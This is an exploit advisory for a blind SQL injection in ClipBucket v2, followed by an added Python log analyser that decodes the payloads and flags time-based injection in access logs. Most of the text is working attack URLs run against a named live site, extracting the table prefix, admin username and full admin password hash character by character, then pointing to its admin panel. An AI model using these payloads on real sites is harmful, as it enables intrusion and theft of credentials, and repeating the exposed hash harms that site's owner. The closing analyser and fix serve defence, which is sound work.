===============================================================================
Vulnerable Software: ClipBucket v2
Official Site: http://clip-bucket.com/
================================================================================
Exploited: In Wild.
================================================================================
Vuln Desc:
ClipBucket v2 is prone to a blind SQL injection vulnerability.
It seems to be a fairly old version and I'm a bit lazy to "fingerprint" which build is vulnerable.
Anyway, at least the page source will "say": <!-- ClipBucket v2 -->
If you want to fingerprint whether a target site is vulnerable, simply use this (if you get a "delay", it is a vulnerable version):
site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--
There is also another way to fingerprint it:
On vulnerable versions you will find menus like these (especially the Help menu section on the index page):
© ClipBucket v2 2012
Home Contact Us About us Privacy Policy Terms of Serivce Help
Real exploitation example:
radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
the table name is 13 characters here
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
the table prefix needs to be found:
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
THIS RETURNS TRUE.
//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--
//TRUE first character of the table:
c
=========================
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
2nd character: b
3rd character: _
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
table prefix: cb_
Checking the user id:
//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--
ID=1
UNAME: admin
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--
How to pull the password:
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--
PASS:
=======================================================
1st character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--
OR:
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 56250 ms
=======================================================
2nd character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 55578 ms
=======================================================
3rd character: c
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--
RTIME: 55579 ms
=======================================================
4th character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 55656
=======================================================
5th character: a
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--
RTIME: 56234
=======================================================
6th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 69672 ms
=======================================================
7th character: a (check later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--
RTIME: 17266 ms
=======================================================
8th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56141 ms
=======================================================
9th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56125 ms
=======================================================
10th character: 2
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--
RTIME: 56157 ms
=======================================================
11th character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 55937 ms
=======================================================
12th character: b
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--
RTIME: 56234
=======================================================
13th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56219 ms
========================================================
14th character: 9
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--
RTIME: 56297 ms
========================================================
15th character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 55641 ms
=========================================================
16th character: f
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--
RTIME: 56828 ms
=========================================================
17th character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 56296 ms
=========================================================
18th character: 5 (check later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 55469 ms
==========================================================
19th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56390 ms
=========================================================
20th character: b
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--
RTIME: 56375
========================================================
21st character: d (check later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 55796 ms
=======================================================
22nd character: d (check later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 56406
=======================================================
23rd character: f
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--
RTIME: 55563 ms
========================================================
24th character: 0 (check later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--
RTIME: 56172 ms
========================================================
25th character: 4
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 56078 ms
========================================================
26th character: 9
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--
RTIME: 55594 ms
========================================================
27th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56094 ms
========================================================
28th character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 56109 ms
========================================================
29th character: c
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--
RTIME: 55563 ms
========================================================
30th character: d
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 55625 ms
========================================================
31st character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 56188 ms
=========================================================
32nd character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 55625 ms
=========================================================
So we got:
uname: admin
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57
Admin Panel: http://radio5.5.am/admin_area/
//TRUE
Verifying whether the obtained hash is valid:
In this case it again gives a "delay", which is the hint for us: the obtained hash is valid.
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--
[ ]Done[ ]
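Defender-side example added here (not part of the advisory): a small Python analyser that decodes the MySQL `0x...` and `char(...)` literals used in the payloads above so they read as plain text, and flags the time-based blind injection indicators in web-server access-log lines. The log lines, client IP and timestamps are constructed; only the request shape mirrors the `view_item.php?collection=` payloads shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (IP and timestamps made up); the request shape mirrors the
# view_item.php?collection= payloads in the advisory, URL-encoded as a browser sends them.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=17 HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2013:10:01:09 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999%20or%20(select%20if(1=1,sleep(50),0))-- HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2013:10:02:40 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999%20or%20(select%20if(username=char(97,100,109,105,110),sleep(54),0)%20from%20cb_users%20where%20userid=1)-- HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2013:10:03:55 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999%20or%20(select%20if(length(table_name)=char(0x3133),sleep(50),0)%20from%20information_schema.tables%20where%20TABLE_schema%20!=0x696E666F726D6174696F6E5F736368656D61%20limit%201)-- HTTP/1.1" 200 5120
"""
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_CALL = re.compile(r'\bchar\(([0-9a-fA-Fx, ]+)\)', re.I)
HEX_LIT = re.compile(r'0x([0-9a-fA-F]{2,})\b')
TIME_BASED = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
ENUMERATION = re.compile(r'information_schema|\bsubstr(ing)?\s*\(', re.I)

def decode_literals(sql):
    """Replace MySQL char(...) calls and 0x... literals with quoted ASCII strings."""
    def char_repl(m):
        nums = [int(p, 0) if p.lower().startswith('0x') else int(p)
                for p in m.group(1).replace(' ', '').split(',') if p]
        # MySQL char(0x3133) emits the bytes 0x31 0x33 ("13"): render each value big-endian.
        raw = b''.join(n.to_bytes(max(1, (n.bit_length() + 7) // 8), 'big') for n in nums)
        return repr(raw.decode('ascii', errors='replace'))
    def hex_repl(m):
        try:
            return repr(bytes.fromhex(m.group(1)).decode('ascii'))
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # odd-length or non-ASCII literal: leave it as written
    return HEX_LIT.sub(hex_repl, CHAR_CALL.sub(char_repl, sql))

def analyse_request(path):
    """One finding per query parameter carrying time-based blind-SQLi indicators."""
    findings = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_literals(raw)
            tags = [t for t, rx in (('time-based', TIME_BASED), ('enumeration', ENUMERATION))
                    if rx.search(decoded)]
            if tags:
                findings.append({'param': name, 'tags': tags, 'decoded': decoded})
    return findings

def scan_log(text):
    """Return (client_ip, finding) pairs for every flagged request in an access log."""
    hits = []
    for line in text.splitlines():
        m = REQ.search(line)
        if m:
            hits.extend((line.split()[0], f) for f in analyse_request(m.group(1)))
    return hits
```

Feeding the decoded `collection` value back into an alert makes the extraction visible at a glance (`'information_schema'`, `'admin'`, `substr(password,N,1)='3'`), and the fix on the application side is the same regardless of payload shape: bind `collection` as an integer in a prepared statement instead of concatenating it into the query.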
+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++
Respect && Thank you.
/AkaStep ^_^